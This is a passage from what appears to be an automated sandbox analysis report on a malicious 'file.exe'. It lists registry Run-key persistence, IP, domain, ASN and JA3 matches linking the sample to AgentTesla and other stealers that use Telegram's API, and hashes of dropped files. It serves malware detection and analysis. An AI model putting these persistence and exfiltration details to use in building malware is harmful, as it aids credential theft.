                                              19:38:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Qasvjoldkyh "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                                              19:38:23API Interceptor752x Sleep call for process: file.exe modified
                                              19:38:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                              19:38:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Qasvjoldkyh "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                                              19:38:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                              19:39:35API Interceptor18x Sleep call for process: Qasvjoldkyh.exe modified
                                              19:39:48API Interceptor116x Sleep call for process: kDPmkTm.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              149.154.167.220file.exeGet hashmaliciousGurcu StealerBrowse
                                                PSFBGrvmxy.exeGet hashmaliciousAgentTeslaBrowse
                                                  izwFjkhFJm.exeGet hashmaliciousAgentTeslaBrowse
                                                    widnOAntje.exeGet hashmaliciousAgentTeslaBrowse
                                                      Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                        https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.htmlGet hashmaliciousUnknownBrowse
                                                          g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                              Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                  PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                    PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                      PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                        FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                          doc10010679052382012143717.exeGet hashmaliciousAgentTeslaBrowse
                                                                            EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                              NJA7TOaADm.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                2wJjtj30x6.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  iubK8Ka7o7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    Bank_Slip-_701536.docGet hashmaliciousAgentTeslaBrowse
                                                                                      104.237.62.211CsTapHIkAO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                          DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                            New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                              PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                    IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                                                        main.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                          EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            YWombrpvpG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              VCO00IddkzE1Fea.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                Parts.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  ARRIVAL_NOTICE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                    e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      Dn4GujmGOF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        XOuNd4W6e6.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                          Inv-67383728 [Reference Nr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            Attachment.zipGet hashmaliciousAgentTesla, zgRATBrowse

                                                                                                                              Domains

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              api4.ipify.orgT4oIN41uUE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              PSFBGrvmxy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 64.185.227.155
                                                                                                                              izwFjkhFJm.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              Q4YODvoYjL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 64.185.227.155
                                                                                                                              CsTapHIkAO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 104.237.62.211
                                                                                                                              cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 64.185.227.155
                                                                                                                              FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 64.185.227.155
                                                                                                                              DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 104.237.62.211
                                                                                                                              TT_copy.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 64.185.227.155
                                                                                                                              PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 64.185.227.155
                                                                                                                              2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 104.237.62.211
                                                                                                                              REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                              • 104.237.62.211
                                                                                                                              eRPRiQhQEI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              INV_SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              IMG_6071220733pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 104.237.62.211
                                                                                                                              api.telegram.orgfile.exeGet hashmaliciousGurcu StealerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              PSFBGrvmxy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              izwFjkhFJm.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              widnOAntje.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.htmlGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              PO_IN34023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              FixDefError.exeGet hashmaliciousXmrigBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              doc10010679052382012143717.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              EPe7VpI8DZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              NJA7TOaADm.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              2wJjtj30x6.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              iubK8Ka7o7.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              Bank_Slip-_701536.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220

                                                                                                                              ASNs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              TELEGRAMRUfile.exeGet hashmaliciousVidarBrowse
                                                                                                                              • 149.154.167.99
                                                                                                                              file.exeGet hashmaliciousGurcu StealerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              PSFBGrvmxy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              izwFjkhFJm.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              widnOAntje.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              https://dev-microvu.pantheonsite.io/wp-content/uploads/2023/03/conn-1.htmlGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                              • 149.154.167.99
                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                                                              • 149.154.167.99
                                                                                                                              setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                              • 149.154.167.99
                                                                                                                              setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                                                              • 149.154.167.99
                                                                                                                              setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                              • 149.154.167.99
                                                                                                                              setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                                                                                                              • 149.154.167.99
                                                                                                                              setup.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                                                              • 149.154.167.99
                                                                                                                              setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                              • 149.154.167.99
                                                                                                                              setup.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, HTMLPhisher, VidarBrowse
                                                                                                                              • 149.154.167.99
                                                                                                                              setup.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                                                                                              • 149.154.167.99
                                                                                                                              WEBNXUST4oIN41uUE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              02OVGHpJ8z.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 64.185.227.155
                                                                                                                              PSFBGrvmxy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              izwFjkhFJm.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              Q4YODvoYjL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 64.185.227.155
                                                                                                                              CsTapHIkAO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 64.185.227.155
                                                                                                                              FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 64.185.227.155
                                                                                                                              DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              New_Order_M2023SI3.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 104.237.62.211
                                                                                                                              TT_copy.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 64.185.227.155
                                                                                                                              PO_340166.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 64.185.227.155
                                                                                                                              2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              Product_specifications.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              REQUEST_FOR_QUOTE_1603023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              eRPRiQhQEI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76
                                                                                                                              INV_SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 173.231.16.76

                                                                                                                              JA3 Fingerprints

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousGurcu StealerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              T4oIN41uUE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              PSFBGrvmxy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              izwFjkhFJm.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              Q4YODvoYjL.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              widnOAntje.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              Smh3IA9098.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              CsTapHIkAO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              g0PWOnCNZH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              Payment Invoice file.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              Budget plan 2023.zipGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              setup.exeGet hashmaliciousXmrigBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              Payment Invoice 0012657.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              FeDex_shipping_document.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              PDA_REQUEST_DISCHARGE_55,000_MT_GRAIN_IN_BULK_pdf.exeGet hashmaliciousVector StealerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211
                                                                                                                              PO2023#PREORDER.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              • 104.237.62.211

                                                                                                                              Dropped Files

                                                                                                                              No context

                                                                                                                              Created / dropped Files

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Qasvjoldkyh.exe.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1459
                                                                                                                              Entropy (8bit):5.3420905847574325
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                                                                                                              MD5:FB4B7720101F874710FF986326F7980F
                                                                                                                              SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                                                                                                              SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                                                                                                              SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                                                                                                              Malicious:false
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):1459
                                                                                                                              Entropy (8bit):5.3420905847574325
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                                                                                                              MD5:FB4B7720101F874710FF986326F7980F
                                                                                                                              SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                                                                                                              SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                                                                                                              SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                                                                                                              Malicious:true
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kDPmkTm.exe.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1459
                                                                                                                              Entropy (8bit):5.3420905847574325
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                                                                                                              MD5:FB4B7720101F874710FF986326F7980F
                                                                                                                              SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                                                                                                              SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                                                                                                              SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                                                                                                              Malicious:false
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):5829
                                                                                                                              Entropy (8bit):4.902247628650607
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:3CJ2Woe5F2k6Lm5emmXIGegyg12jDs+un/iQLEYFjDaeWJ6KGcmXs9smEFRLcU6j:Wxoe5FVsm5emdzgkjDt4iWN3yBGHc9s8
                                                                                                                              MD5:F948233D40FE29A0FFB67F9BB2F050B5
                                                                                                                              SHA1:9A815D3F218A9374788F3ECF6BE3445F14B414D8
                                                                                                                              SHA-256:C18202AA4EF262432135AFF5139D0981281F528918A2EEA3858B064DFB66BE4F
                                                                                                                              SHA-512:FD86A2C713FFA10FC083A34B60D7447DCB0622E83CC5992BBDAB8B3C7FEB7150999A68A8A9B055F263423478C0879ED462B7669FDE7067BC829D79DD3974787C
                                                                                                                              Malicious:false
                                                                                                                              Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):15596
                                                                                                                              Entropy (8bit):5.5531622815475545
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:Fte/bq0uRu2AH68SBxnuilrIaBsFv917NnlZ:VA/4xuilrwxplZ
                                                                                                                              MD5:9EF84D725C2607A4AED65AD3158C3AB1
                                                                                                                              SHA1:9BAB855CB21B192916AD2E728A2A7447ED986BA2
                                                                                                                              SHA-256:5F70DC72B68DB5E131213081C0B253710ABD4F42EBA9BB0449E4ADED30F3070F
                                                                                                                              SHA-512:7799E2FA990922355A2DC76BECA969FFCA860060C2CFAFF89A9F9A6E935ACE4747351181570411422BB3AA9B3F83507E8F9E6764090EF7F2EF4918F07E4A1189
                                                                                                                              Malicious:false
                                                                                                                              Preview:@...e...........$.......$...N.A.A.....1.........................H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2egqyutc.ddd.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:U:U
                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                              Malicious:false
                                                                                                                              Preview:1

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cea0kgqa.155.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:dropped
